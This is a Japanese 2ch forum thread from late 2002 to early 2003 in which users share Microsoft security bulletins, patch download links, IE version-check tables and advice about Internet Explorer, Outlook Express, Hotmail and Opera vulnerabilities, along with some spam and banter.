・Windows XP Professional
・Windows XP Tablet PC Edition
・Windows XP Media Center Edition
最大深刻度:(緊急)
修正プログラム
・Windows XP 32-bit
http://download.microsoft.com/download/f/2/e/f2e56679-17b3-4ec7-b535-2eee3b1212d4/Q329390_WXP_SP2_x86_JPN.exe
・Windows XP 64-bit
http://download.microsoft.com/download/6/6/9/6697eeaa-8409-42a6-b9a7-ed05b98c341a/Q329390_WXP_SP2_ia64_JPN.exe


314 :bloom:02/12/19 09:34

http://www.agemasukudasai.com/bloom/

315 :名無しさん@お腹いっぱい。:02/12/19 13:09
>>313 Windows XPに「緊急」のセキュリティ・ホール,任意のプログラムを実行させられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021219/1/

316 :cheshire-cat ◆PhCATJR.v6 :02/12/20 01:09
まさかhome版で64ビット用パッチ入れようとした人、居ないっすよね。
ちょっと初心者板で気になったんで。。。。。

317 :名無しさん@お腹いっぱい。:02/12/20 01:17
>>316
少なくともこの板ではそんな人はいない! と信じたい・・・
あと10スレ後に質問来るかもしれんけど・・・

318 :名無しさん@お腹いっぱい。:02/12/20 01:31
Windows Updateに上がってるから、普通はWindows Updateをすると思いたい…。

319 :名無しさん@お腹いっぱい。:02/12/20 20:45
>>318
漏れもそう思う。

つか間違って64ビット用入れようとしたら警告とか出ないのかな。
そこまでMSも親切じゃねぇか・・・

320 :名無しさん@Emacs:02/12/20 20:58
>>318

"IEおすすめ設定" にすると使えなくなるんだよね。

321 :名無しさん@お腹いっぱい。:03/01/08 12:44
2002年末に相次いだ「緊急」のセキュリティ・ホール,改めて確認を
 深刻な Windows Shell のホール,「スパイ・データ」の出現に要警戒
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030107/1/

322 :名無しさん@お腹いっぱい。:03/01/08 12:46
古いネタだけど、もし64bit版放りこんで壊れたら700円請求できるんだよね?

323 :名無しさん@お腹いっぱい。:03/01/08 13:26
>>322 なんで700円?

324 :山崎渉:03/01/15 15:44
(^^)

325 :名無しさん@お腹いっぱい。:03/01/21 15:03
IEのXSSバグで任意サイトのCookieが漏洩
http://slashdot.jp/article.pl?sid=03/01/18/1226227
>jbeef曰く、"現時点でIEはcookieを盗まれ得るブラウザである。cookieを盗ま
>れると致命傷となるサイトの利用には注意が必要だ。12月に2つのcookie が
>漏洩する脆弱性が報告されたが、まだパッチが出ていない。(略)

326 :名無しさん@お腹いっぱい。:03/01/21 15:04
IEのCookieをオフにしても有効なCookieモドキ
http://slashdot.jp/article.pl?sid=03/01/19/2134203

327 :名無しさん@お腹いっぱい。:03/01/23 11:37
OEではなくOutlookだが、

「MS03-003: Outlook 2002 が Version 1 の Exchange Server Security
証明書を処理する方法に存在する問題により、情報が漏えいする (812262)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-003ov.asp
最大深刻度:警告

328 :名無しさん@お腹いっぱい。:03/01/27 22:21
Microsoft,Windows Server 2003用にIE新版を用意
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030127/4/

329 :名無しさん@お腹いっぱい。:03/01/30 11:03
Windows用ブラウザ「Opera 7」の製品版,ノルウェーのオペラがリリース
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030130/6/
http://www.opera.com/

軽快ブラウザ「Opera」Vol.19
http://pc2.2ch.net/test/read.cgi/win/1043220804/l50

330 :MS03-004:03/02/06 08:28
MS03-004 Cumulative Patch for Internet Explorer (810847)
・Who should read this bulletin: Customers using Microsoft® Internet Explorer.
・Impact of vulnerability: Allow an attacker to execute commands on a user’s system.
・Maximum Severity Rating: Critical
・Recommendation: Customers should install the patch immediately.
・Affected Software:
 Microsoft Internet Explorer 5.01
 Microsoft Internet Explorer 5.5
 Microsoft Internet Explorer 6.0
・End User Bulletin: An end user version of this bulletin is available at:
http://www.microsoft.com/security/security_bulletins/ms03-004.asp

331 :名無しさん@お腹いっぱい。:03/02/06 09:20
>>330 Windows Updateで更新可

332 :MS03-004: Internet Explorer 用の累積的な修正プログラム (810847):03/02/06 12:16
IEにまたもや「緊急」のセキュリティ・ホール,すぐにWindows Updateの利用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030206/1/

マイクロソフトは2月6日,Internet Explorer(IE)の新たなセキュリティ・ホールとその
パッチを公開した。セキュリティ・ホールを悪用されると,WebページやHTMLメールを 閲覧しただけで,ウイルスなどの悪意があるプログラムを送り込まれて実行させられ
る恐れがある。対策は「Windows Update」などを利用してパッチを適用すること。最大
深刻度は「緊急(Critical)」なので,Windowsユーザーは早急にパッチを適用する必要
がある。

333 :MS03-004(Q810847):03/02/06 12:42
修正プログラム
・ Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/e/6/e/e6ee3524-714d-4b1f-81c1-5ac1682e9048/q810847.exe
・ Internet Explorer 6 (WU)
http://download.microsoft.com/download/d/5/b/d5b9d2d5-401a-46f9-b8d2-aad6e62f7216/q810847.exe
・ Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/2/7/e/27e15564-6035-47de-a42c-c72f35d0492a/q810847.exe
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000 (WU)
http://download.microsoft.com/download/1/0/b/10b3e8d5-a6f6-4b32-b0af-318d73693e77/q810847.exe
注意: 64bit 版の Windows XP をお使いのお客様は、
以下の Internet Explorer 6 Service Pack 1 (64bit) の適用を
お願いします。
・ Internet Explorer 6 Service Pack 1 (64bit) (WU)
http://download.microsoft.com/download/4/3/1/431f40eb-c7ea-4616-ab48-1f9fbba92409/q810847.exe
(WU) の付いている修正プログラムは Windows Update から
インストールすることもできます。
対象となる製品
・ Internet Explorer 6 Service Pack 1
・ Internet Explorer 6 for Windows XP
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意:
Internet Explorer 6 の修正プログラムは、
Windows XP 環境にのみ適用可能です。
Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004ov.asp

334 :名無しさん@お腹いっぱい。:03/02/07 00:48
クロスドメインとクロスサイトって同じ意味?

335 :MS03-004:03/02/07 19:21
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004.asp
今回の更新内容
2003 年 1 月 20 日に Windows Update に誤って公開された
Windows NT 4.0 の修正プログラム候補についての 「お詫び」 を追記しました。
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。

Windows NT 4.0 の環境において、この修正プログラム候補をインストールされ
たお客様は、お手数ですが、2003 年 2 月 6 日に公開した本セキュリティ情報
より、 Internet Explorer 用の修正プログラムをダウンロードし、再適用を
お願いいたします。

お詫び : Windows NT 4.0 の環境において、2003 年 1 月 20 日に
修正プログラム候補が Windows Update に誤って公開されました。お客様には
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。この
修正プログラムをインストールされたお客様は、お手数ですが、2003 年 2 月
6 日に公開した本セキュリティ情報より、 Internet Explorer 用の
修正プログラムをダウンロードし、再適用をお願いいたします。なお、以前の
修正プログラムをインストールされた環境では、Windows Update に
本修正プログラムが表示されません。現在、正しく検出できるよう
Windows Update を改良しております。

336 :名無しさん@お腹いっぱい。:03/02/07 23:35
とあるメーカーからのメルマガを受信したんだけど、
受信トレイにあるそのメールを選択するとOEが固まり落ちます。
削除トレイに移動できなくてちょっと困ってます。。

ウィルスはチェックしたんだけど感染してないようす。
新手の嫌がらせか?


337 :名無しさん@お腹いっぱい。:03/02/08 01:59
OEがだめなら、どのメールソフトがいいの?
なるべくOEと同じように使えるのがいいんだけど。

338 :名無しさん@お腹いっぱい。:03/02/08 06:26
フリーでhotmailが使えるのがいい
それさえ出来れば今すぐOEから変えるけど

339 :名無しさん@お腹いっぱい。:03/02/08 09:31
>>338 最新パッチあててればOE最強。

340 :338:03/02/09 06:59
>>339
本当?
最新パッチを当然あててるけど、OEは信用していない
普段はPDAでnPOP(メーラー)使ってヘッダ見て(場合によってはサーバーから削除して)からOEで受信しているけど

バスターを入れているのに神経質過ぎるか

341 :名無しさん@お腹いっぱい。:03/02/09 09:24
バスター入れて常駐保護してんなら
洗面所で
「汚れが落ちない、落ちないの・・・どうして、どうして汚れがおちないのぉーーーーーっ」
って絶叫しながら延々3時間ぐらい手を洗ってるようなもん

342 :名無しさん@お腹いっぱい。:03/02/09 18:00
www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-004ov.asp
>Internet Explorer 6 の修正プログラムは、Windows XP 環境にのみ適用可能です。

これってwin98&ie6.0にあてるパッチはなし?

343 :名無しさん@お腹いっぱい。:03/02/09 18:12
>>342
IE6sp1,IE5.5

344 :98&6.0:03/02/09 18:36
「Internet Explorer 6 Service Pack 1」でいいの?

345 :名無しさん@お腹いっぱい。:03/02/09 18:53
>>344 Yes.

346 :名無しさん@お腹いっぱい。:03/02/09 19:25
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp

対象プラットフォーム(以下の組み合わせのみ)
Windows 95:IE5.5SP2
Windows 98:IE5.5SP2,IE6.0SP1
Windows ME:IE5.5SP2,IE6.0SP1
Windows NT 4.0 SP6a:IE5.5SP2,IE6.0SP1
Windows 2000 SP3:IE5.01SP3,IE5.5SP2,IE6.0SP1
Windows XPSP1:IE6.0,IE6.0SP1

IEの各バージョンDL先
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp

347 :(。・_・。):03/02/09 19:43
     ∧_∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ( ´∀`)/<先生!流行ってます。http://homepage3.nifty.com/digikei/ten.html
 _ / /   /   \___________
\⊂ノ ̄ ̄ ̄ ̄\
 ||\        \
 ||\|| ̄ ̄ ̄ ̄ ̄||
 ||  || ̄ ̄ ̄ ̄ ̄||


348 :cheshire-cat ◆PhCATJR.v6 :03/02/09 22:18
>>347
踏まないよん

349 :IE最新バージョン情報まとめ:03/02/10 08:40
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp

【対策後の確認】
・バージョン画面の「更新バージョン」の行に次項のバージョンと
《MS03-004》を適用して「Q810847」が表示されていればOK.

・インターネットエクスプローラのバージョン確認は、「ヘルプ」「バージョン情報」の「バージョン」で確認。
 5.00.3502.1000 Internet Explorer 5.01 Service Pack 3 (Windows 2000 SP3用のみ)
 5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
 6.0.2600.0000 Internet Explorer 6 (Windows XPのみ但XP SP1を除く)
 6.0.2800.1106 Internet Explorer 6 Service Pack 1(Windows 98,ME,NT4.0 SP6a,2000 SP3,XP SP1のみ)

※IEが上記バージョンでない場合は以下で最新IEをダウンロードの上《MS03-004》を適用する(対応OSに注意)。
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp

350 :名無しさん@お腹いっぱい。:03/02/10 14:16
>>349
ありがとん

351 :w98&ie6.0.2600...:03/02/10 22:31
Internet Explorer 6 Service Pack 1
Internet Explorer 6

駄目だった、XPじゃねーだろヴォケって言われる
先にsp1入れろってこと?

352 :名無しさん@お腹いっぱい。:03/02/11 10:47
>>351先にIE6SP1入れろ
>>346>>349

353 :名無しさん@お腹いっぱい。:03/02/11 13:27
無理して IE OE を使わなくても良いと思うんだけど。

おすすめメーラ。
[EdMax Free] ttp://www.edcom.jp/

354 :名無しさん@お腹いっぱい。:03/02/11 20:59
日本語版Operaの最新バージョン「Opera 6.05」に深刻なセキュリティ・ホール
任意のプログラムを実行される,対策は設定ファイルの編集
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030210/2/
Opera6.05 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j010

355 :名無しさん@お腹いっぱい。:03/02/11 22:12
>>353
EdMaxは生のメッセージを保存しないから糞。

356 :MS03-004追加情報:03/02/13 18:41
今回の更新内容
このセキュリティ情報ページを更新し、いくつかのシナリオで、
この修正プログラムにより発生する、セキュリティに関連しない問題を
解決する修正プログラムが入手可能になったことをお知らせしました。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004.asp
このセキュリティ情報のリリース後に、この修正プログラムにセキュリティには
関連しない問題が確認されました。その問題とは特定の状況で、ユーザー、主に
コンシューマに影響を及ぼす可能性があります。具体的には、この問題により、
購読ベースの Web サイトや MSN 電子メールなど、特定のインターネット Web
サイトに認証できなくなる可能性があります。この問題は解決され、この問題を
修正する修正プログラムは 813951 で提供されています。この修正
プログラムは特定のセキュリティに関連しない問題を修正するものであり、この
セキュリティ情報で説明されている修正プログラムは、後半で説明されている
脆弱性を排除するにあたり、有効でした。また、現在でも有効です。今回
お知らせしている修正プログラムの入手方法に関する詳細など、さらに詳しい情報は
http://www.microsoft.com/windows/ie/downloads/critical/813951/default.asp
(英語情報。ダウンロードに関しては [Japanese] を選択して下さい。) および
「よく寄せられる質問」 をご覧下さい。

357 :MS03-004:03/02/13 18:48
>>346に間違いがあるので訂正しておきます。
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms03-004.asp

対象プラットフォーム(以下の組み合わせのみ)
Windows 98SE :IE5.5SP2,IE6.0SP1
Windows ME :IE5.5SP2,IE6.0SP1
Windows NT 4.0 SP6a :IE5.5SP2,IE6.0SP1
Windows 2000 SP3 :IE5.01SP3,IE5.5SP2,IE6.0SP1
Windows XP :IE6.0
Windows XP SP1 :IE6.0SP1

IEの各バージョンDL先
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp

358 :IE最新バージョン情報まとめ(訂正版):03/02/13 18:56
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp

【対策後の確認】
・バージョン画面の「更新バージョン」の行に次項のバージョンと
《MS03-004》を適用して「Q810847」が表示されていればOK.

・インターネットエクスプローラのバージョン確認は、「ヘルプ」「バージョン情報」の「バージョン」で確認。
 5.00.3502.1000 Internet Explorer 5.01 Service Pack 3 (Windows 2000 SP3用のみ)
 5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 (Windows 98SE,ME,NT 4.0 SP6a,2000 SP3)
 6.0.2600.0000 Internet Explorer 6 (Windows XPのみ、XP SP1を適用していないものに限る)
 6.0.2800.1106 Internet Explorer 6 Service Pack 1(Windows 98SE,ME,NT4.0 SP6a,2000 SP3,XP SP1のみ)

※IEが上記バージョンでない場合は以下で最新IEをダウンロードの上《MS03-004》を適用する(対応OSに注意)。
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp

359 :名無しさん@お腹いっぱい。:03/02/13 20:00
>>356のを当てたらバージョン情報にQ813951がついた。

360 :ショック:03/02/13 21:01
昨日システムの復元(約10日前の状態に)をして、その後OE6を開いたら9/1〜復元直前のメールデータが消えてしまいました。
もしかしたら復元操作とは関係無いかもしれませんが、このようにある一定の期間のメールデータが消えてしまった方はいませんか?
McAfeeのウイルススキャンの関係かとも思いましたが、メールのスキャン設定はしてませんでした。
なにかご存知の方アドバイスお願いします。


361 :名無しさん@お腹いっぱい。:03/02/13 21:19
>>360
板違い。Windows板。

362 :名無しさん@お腹いっぱい。:03/02/13 22:13
>>361
http://pc2.2ch.net/test/read.cgi/win/1043386737/80-81

ワラタ

363 :名無しさん@お腹いっぱい。:03/02/13 22:55
>>361
ワロタ
すこし同情する。

364 :名無しさん@お腹いっぱい。:03/02/13 23:52
>>360
そういう時はバックアップとって再現テストしてくれたまえ。

365 :MS03-004関連:03/02/14 08:40
MS03-004 810487 適用後に OE6 が落ちる、という問題が指摘されている。

Windows板 Outlook Express質問スレッド 2
http://pc2.2ch.net/test/read.cgi/win/1043386737/l50

WinFAQ
ttp://winfaq.jp/cgi-bin/bbs2k/wforum.cgi?mode=allread&no=211295&page=0
ttp://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=allread&no=236558&page=0

366 :360:03/02/14 18:11
>>361
Win板から勧められてきました。
なんだ、たらいまわしか。

367 :名無しさん@お腹いっぱい。:03/02/14 18:16
>>366
ここはセキュリティパッチ関連の報告スレみたいなもんだから
再現性があるかどうか確認してMSに文句いってくれ

368 :名無しさん@お腹いっぱい。:03/02/14 18:36
>>366
おまい勘違いしている。
http://pc2.2ch.net/test/read.cgi/win/1043386737/81
おまいに対するレスではないぞ。
あっちでは誰もレスせずに放置されてる。

369 :名無しさん@お腹いっぱい。:03/02/15 02:26
MS03-004 810487 問題で、MSN hotmail にログインできるように変更したようだ。
再修正パッチしないでも、うまく入れたZO。

370 :名無しさん@お腹いっぱい。:03/02/15 09:49
>>369
MSN hotmail側で対応したってこと?

371 :名無しさん@お腹いっぱい。:03/02/18 11:01
Netscapeはもう過去のもの?――開発中止のうわさ
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030217/4/

トランスウエア,Opera 7 for Windowsの日本語パッケージを発売
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20030217/1/

372 :MS03-004関連:03/02/18 11:06
>>365
MS03-004 適用後 Outlook Express が正しく動作しない
http://support.microsoft.com/default.aspx?scid=kb;ja;814803

373 :名無しさん@お腹いっぱい。:03/02/18 12:35
現実味を帯びてくる「IE 7.0は出ない」という説
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030217/2/

374 :名無しさん@お腹いっぱい。:03/02/18 21:09
まさかとは思うが
メッセンジャーにでも統合されるのか?

375 :名無しさん@お腹いっぱい。:03/02/21 12:32
「パッチ適用のコツ教えます」――MSのセキュリティ担当マネージャが語る
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030220/2/

376 :名無しさん@お腹いっぱい。:03/02/21 22:52
>>375
なんつーか、誰かまともなOSの作り方を教えてあげて・・・(;´Д`)

377 :名無しさん@お腹いっぱい。:03/02/25 16:47
[OE] 長い行のメールを送ると Outlook Express がハングする
http://support.microsoft.com/default.aspx?scid=kb;ja;812110

378 :名無しさん@お腹いっぱい。:03/02/26 09:32
IE/Netscape/Operaユーザーは必見,Webブラウザのセキュリティ総点検
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030225/1/

379 :名無しさん@お腹いっぱい。:03/02/27 08:44
スレ違いスマソ
「MS03-006: Windows Me の 「ヘルプとサポート」 の問題によりコードが実行される (812709)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-006ov.asp
(緊急) URL ハンドラ (hcp://) に未チェックのバッファがあるため、
バッファのオーバーラン攻撃に悪用される可能性があります。

380 :名無しさん@お腹いっぱい。:03/02/28 12:26
トランスウエアが「Opera 7.02 for Windows 日本語版」を公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030227/2/

381 :名無しさん@お腹いっぱい。:03/03/06 08:54
HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。

Hotmailはウィルスチェックをしているとはいうものの、
それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。

さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。

またアンチウィルスソフトもメール受信時のスキャンはPOP3のみでHotmailなどのWebメールに対しては行われないので、
この時点でアンチウィルスソフトを常駐させていても反応しない。
ただしアンチウィルスソフトが常駐している場合は、添付ファイルを開くときに反応する。

したがって、Hotmailがウィルススキャンをしているから大丈夫だと誤解して、アンチウィルスソフトを常駐させずに
Outlook ExpressでHotmailを受信する設定にしている場合、ウィルスの添付ファイルは素通りしてくるので、
添付ファイルを開くと感染する。セキュリティホールがある場合には開かなくても感染する。

382 :名無しさん@お腹いっぱい。:03/03/06 08:55
まとめ
1、HotmailはOutlook Expressで受信せずにブラウザで見に行く。
 ブラウザもOperaやNetscape等のInternet Explorer以外のものが望ましい。
2、アンチウィルスソフトは必ず導入して常駐させておく。ウィルス定義ファイルは常に最新にしておく。
3、Internet Explorer・Outlook ExpressはWindowsUpdateで常に最新の状態にしておく。

383 :bloom:03/03/06 09:12
http://www.agemasukudasai.com/bloom/

384 :名無しさん@お腹いっぱい。:03/03/07 06:25
>>381
> HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。
> Hotmailはウィルスチェックをしているとはいうものの、
> それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
> メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。
> さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
> そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。

知らなかった

Hotmailだけの為にOEを使い続けていたけど意味なかったのか


385 :名無しさん@お腹いっぱい。:03/03/07 13:03
>>384
激しく同意。

386 :名無しさん@お腹いっぱい。:03/03/07 13:08
>>384-385
テストウィルス"eicar"でテストしてみ。OEだとさっくり入ってくるよ。
でもブラウザでHotmailに行くと、添付ファイルをクリックした時に
「感染しています。どうしますか?」みたいなことを聞いてくる。

387 :名無しさん@お腹いっぱい。:03/03/07 17:53
>>381
アンチウィルスソフトって一旦受信したOEのフォルダは
スキャンから除外してるから、
Hotmail経由でOEのフォルダにウィルスが入ってても、
スキャンしたときでも発見されないよね。

んでローカルにウィルスがあるといろいろ危ないよね。
なんかの拍子にアンチウィルスソフトが常駐でなくなったときに
クリックでもしたら大変。

OEでHotmail使うのはやめよう。

388 :名無しさん@お腹いっぱい。:03/03/11 10:24
OE/IE代替として紹介されているOpera6/7にセキュリティホール。
スレ違いだが、一応紹介しておく。

[Opera 7/6] ダウンロード時の長いファイル名で起こるバッファオーバーフローによる脆弱性
http://opera.rainyblue.org/adv/opera02-dlfnbof.php

389 :名無しさん@お腹いっぱい。:03/03/13 19:29
保守

390 :名無しさん@お腹いっぱい。:03/03/14 08:45
>>372の不具合まだ修正されないのかなぁ。
長文のメール書いてるとOEが落ちるから、結構ショックだよね。

391 :名無しさん@お腹いっぱい。:03/03/14 09:59
[VulnWatch] .MHT Buffer Overflow in Internet Explorer
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0118.html

392 :MS03-007:03/03/18 08:23
Windows コンポーネントの未チェックのバッファによりWebサーバーが侵害される(MS03-007)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
このセキュリティ情報の対象となるユーザー :
 Microsoft(R) Windows(R) 2000 をご使用のシステム管理者
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 :
 管理者は、直ちにこの修正プログラムをインストールしてください。
影響を受けるソフトウェア :
 ・Microsoft Windows 2000
修正プログラム :
Microsoft Windows 2000:
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
・すべての言語 (NEC PC-9800 シリーズを除く)
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=ja
・NEC PC-9800 シリーズ
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyID=fbcf9847-d3d6-4493-8dcf-9ba29263c49f&DisplayLang=ja
(WU)このマークの付いている修正プログラムは Windows Update から
インストールすることもできます。

393 :名無しさん@お腹いっぱい。:03/03/18 16:55
age

394 :MS03-007:03/03/19 17:23
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
今回の更新内容
このセキュリティ情報ページを更新し、影響を受ける Windows コンポーネント
を明確にしました。また、「よく寄せられる質問」 に IIS 5.0 に関する質問を
追加し、「修正プログラムに関する追加情報」 の 「警告」 欄に新しい情報を
追加しました。

395 :名無しさん@お腹いっぱい。:03/03/19 17:46
>>392>>394
OEともIEとも関係なかったり…

396 :名無しさん@お腹いっぱい。:03/03/19 22:44
>>388の修正済みバージョン、Opera7.03しかなかったが、
Opera6.06も、いまのところ英語版だけだが、リリースされた。
http://www.opera.com/windows/changelogs/606/
ftp://ftp.opera.com/pub/opera/win/606/en/(Opera6.06 EN)

ノルウェーOpera Software,セキュリティ・ ホールを修正した「Opera 7.03」を公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030314/1/

397 :名無しさん@お腹いっぱい。:03/03/20 10:47
Windows全バージョンに「緊急」の脆弱性
http://www.zdnet.co.jp/news/0303/20/nebt_18.html

398 :MS03-009:03/03/20 10:55
「MS03-009: ISA Server DNS アタック検出フィルタの問題により、サービス拒否が起こる (331065)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-009ov.asp
対象となる製品:Microsoft ISA Server 2000

399 :MS03-008:03/03/20 10:56
>>397
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-008.asp?tag=nl

400 :名無しさん@お腹いっぱい。:03/03/20 12:33
MS03-008 Windows スクリプト エンジンの問題により、コードが実行される(814078)
日本語ページ
http://www.microsoft.com/japan/technet/security/bulletin/ms03-008ov.asp
Windowsにまたもや「緊急」のホール,すべてのユーザーはWindowsUpdateの実施を
ISA Server 2000には「警告」のセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/1/

401 :名無しさん@お腹いっぱい。:03/03/20 17:32
>>388>>396
「Opera パッケージ版」はセキュリティ・ホールがあるOpera 7.02,ユーザーはバージョン・アップを
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/2/

402 :名無しさん@お腹いっぱい。:03/03/22 11:59
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp

現在Internet Explorer 5.5SP2/6のダウンロードは停止中、マイクロソフトが確認を行っています。

403 :名無しさん@お腹いっぱい。:03/03/24 12:13
age

404 :MS03-007:03/03/26 08:08
「IISを動かしていなくても危険」――Windows 2000の深刻なセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030325/1/

405 :MS03-007:03/03/26 08:10
相次ぐ「緊急」にマヒするな,IISのホール は“過去最大級”の危険度
パッチ公開前に攻撃コードが存在,既に攻撃されている恐れあり
今週のSecurity Check [Windows編] (第91回,2003年3月26日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030325/1/

406 :MS03-010:03/03/27 10:48
「MS03-010: RPC エンドポイント マッパーの問題により、サービス拒否の攻撃が実行される (331953)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-010ov.asp
○概要
この問題は、下記製品のリモート プロシージャ コール (RPC: Remote
Procedure Call) のエンドポイント マッパーに問題があり、サービス拒否の
攻撃を受ける可能性があります。その結果、悪意のあるユーザーにお客様の
コンピューター上のサービスを停止させられる可能性があります。
○対象となる製品
・Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP

407 :名無しさん@お腹いっぱい。:03/03/27 14:55
>>406
Windows NT/2000/XPの機能を攻撃者が停止できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030327/1/

408 :MS03-007:03/03/27 17:24
当初の報告よりもずっと深刻だったWindows 2000のセキュリティホール
http://www.zdnet.co.jp/enterprise/0303/26/epn01.html
3月18日に公表されたWindows 2000のセキュリティホールが与える影響は、当初考
えられて いたよりもずっと広範囲に及ぶという。速やかなパッチの適用が必要だ。

409 :名無しさん@お腹いっぱい。:03/04/07 19:24
Opera 7とNetscape 7.02 Webブラウザにサービス拒否攻撃を受ける弱点
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030407/1/

410 :MS03-011:03/04/10 11:40
Microsoft VMにまたもや「緊急」のセキュリティ・ホール,Windowsユーザーはすぐに対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030410/1/
MS03-011 に関する情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-011ov.asp

411 :名無しさん@お腹いっぱい。:03/04/10 13:06
>>410
これ5MBもあるし、鯖が混んでるのか、なかなか落ちてこないね。

412 :名無しさん@お腹いっぱい。:03/04/16 10:07
米マイクロソフト,今後1年間のセキュリティの取り組みを明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030416/3/

413 :名無しさん@お腹いっぱい。:03/04/16 19:14
Windows Updateから修正パッチを適用できない問題が発覚,NTユーザーは注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030416/1/

414 :MS03-013:03/04/17 08:18
「MS03-013: Windows カーネル メッセージ処理のバッファ オーバーランにより、権限が昇格する (811493)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013ov.asp
影響を受けるソフトウェア
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0 Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP

415 :名無しさん@お腹いっぱい。:03/04/17 10:13
Windowsに「重要」のセキュリティ・ホール,一般ユーザーに管理者権限を奪われる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030417/1/

416 :山崎渉:03/04/17 11:59
(^^)

417 :名無しさん@お腹いっぱい。:03/04/17 12:38
age

418 :山崎渉:03/04/20 06:02
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

419 :名無しさん@お腹いっぱい。:03/04/20 21:17
sage

420 :名無しさん@お腹いっぱい。:03/04/21 18:10
>>414
のセキュリティパッチいれるとXpのIE6が使い物にならないくらい遅くなるから注意。
アンインストールで元に戻った。

421 :名無しさん@お腹いっぱい。:03/04/21 19:20
>>420
このあたりで報告されてるのと同じ?
http://winfaq.jp/cgi-bin/bbs2k/wforum.cgi?mode=allread&no=237706&page=50

422 :名無しさん@お腹いっぱい。:03/04/21 21:28
>>421
俺の場合はIEだけ遅くなった。
